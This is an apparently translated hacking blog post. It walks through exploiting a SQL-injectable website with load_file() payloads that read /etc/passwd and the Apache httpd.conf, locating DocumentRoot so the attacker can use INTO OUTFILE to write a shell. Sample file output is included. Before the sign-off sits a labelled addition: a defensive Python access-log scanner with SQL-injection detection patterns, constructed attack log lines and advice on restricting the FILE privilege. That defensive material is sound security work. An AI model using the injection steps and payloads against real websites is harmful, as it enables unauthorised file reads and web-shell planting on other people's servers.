Finding DOCUMENT_ROOT using the load_file technique - SQL Into Outfile

-
Hi friends.
I'm ikal.
Here I'm going to share something.
-

You've surely run into a website that is vulnerable to SQL injection, and when you checked the user and the user's privileges you got a Y, which means you can go ahead and run INTO OUTFILE on the server. But then you got stuck finding the path to spawn your shell in, so you used the load_file technique and read /etc/passwd from the server. And once /etc/passwd shows up, you're still left wondering which directory is the document_root of your target website.

Okay, straight to it.
First you need a target, then inject and check the user and the user's privileges on your target.

Then do load_file('/etc/passwd'):

load_file('/etc/passwd'),4+from+mysql.user--+-

and if it works, you'll get something roughly like this.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:995:User for polkitd:/:/sbin/nologin
colord:x:996:993:User for colord:/var/lib/colord:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
unbound:x:995:992:Unbound DNS resolver:/etc/unbound:/sbin/nologin

So that's roughly what it'll look like.
Now, if you can't tell which directory is the document_root of the target server, try this trick:

load_file('/etc/httpd/conf/httpd.conf'),4+from+mysql.user--+-

That's it, just replace passwd with httpd/conf/httpd.conf.

And if it works, it'll show something like this:

#
# This is the main Apache HTTP server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs/2.4/> for detailed information.
# In particular, see
# <URL:http://httpd.apache.org/docs/2.4/mod/directives.html>
# for a discussion of each configuration directive.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so 'log/access_log'
# with ServerRoot set to '/www' will be interpreted by the
# server as '/www/log/access_log', where as '/log/access_log' will be
# interpreted as '/log/access_log'.

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# Do not add a slash at the end of the directory path.  If you point
# ServerRoot at a non-local disk, be sure to specify a local disk on the
# Mutex directive, if file-based mutexes are used.  If you wish to share the
# same ServerRoot for multiple httpd daemons, you will need to change at
# least PidFile.
#
ServerRoot "/etc/httpd"

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, instead of the default. See also the

That's what shows up; the real thing is very long :'v, I only copied this much.

And if you want to find the document_root, just use the browser's find-in-page (click the three dots in the top-right corner, then search in tab) and type DOCUMENTROOT. And voila, just copy what you get (the document root), then do your into outfile.
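Seen from the defending side, every step above leaves a distinctive trace in the web server's access log: a UNION SELECT carrying load_file(, a read of /etc/passwd or httpd.conf, a reference to mysql.user, and finally INTO OUTFILE. The script below is an added example, not code from the original post: it parses Common Log Format lines and flags requests that match those signatures after URL-decoding twice and stripping inline SQL comments. The sample log lines, IP addresses and timestamps are constructed, and the rule names and function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (sample data, not real traffic).
# The request shapes mirror the payload fragments the post shows; the first
# and last lines are benign and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user--+- HTTP/1.1" 200 7811
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-1+union+select+1,load_file(%27/etc/httpd/conf/httpd.conf%27),3,4--+- HTTP/1.1" 200 9911
203.0.113.5 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?id=-1+union+select+1,2,3,4+into+outfile+%27/var/www/html/x.txt%27--+- HTTP/1.1" 500 220
198.51.100.7 - - [10/Oct/2023:13:58:00 +0000] "GET /search.php?q=load%20file%20docs HTTP/1.1" 200 3301
"""

# Common Log Format: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Hypothetical rule names (my own); each pattern runs over the decoded request target.
SIGNATURES = [
    ("mysql_load_file", re.compile(r"load_file\s*\(", re.I)),
    ("mysql_into_outfile", re.compile(r"into\s+(outfile|dumpfile)\b", re.I)),
    ("union_select", re.compile(r"union\s+(all\s+)?select\b", re.I)),
    ("sensitive_path", re.compile(r"/etc/passwd|/etc/shadow|httpd\.conf|apache2\.conf|my\.cnf", re.I)),
    ("mysql_user_table", re.compile(r"\bmysql\.user\b", re.I)),
]


def normalise(target: str) -> str:
    """URL-decode twice (catches %25 double-encoding), turn '+' into spaces,
    and replace inline /* */ comments with a space so 'union/**/select'
    still reads as 'union select'."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"/\*.*?\*/", " ", decoded)


def severity(hits):
    """A file read/write primitive outranks a plain UNION probe."""
    if "mysql_load_file" in hits or "mysql_into_outfile" in hits:
        return "critical"
    if "union_select" in hits:
        return "high"
    return "medium"


def scan_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = normalise(m.group("target"))
    hits = [name for name, rx in SIGNATURES if rx.search(target)]
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "hits": hits,
        "severity": severity(hits),
        "target": target,
    }


def scan_log(text: str):
    """Scan a whole log body; findings come back in log order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']:8} {','.join(f['hits'])}  {f['target']}")
```

Run it over a real access log by swapping SAMPLE_LOG for the file contents; a 500 on the INTO OUTFILE request is itself a useful signal, because the write usually fails when the database account lacks the FILE privilege or secure_file_priv points away from the web root. On the database side that is exactly the precondition the post depends on (the Y in the privilege check): give the web application's MySQL account no FILE privilege, and set secure_file_priv to NULL (which disables load_file() and INTO OUTFILE entirely) or to a dedicated directory outside the document root.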


Yep, that's probably all for now.
Thanks.
See you.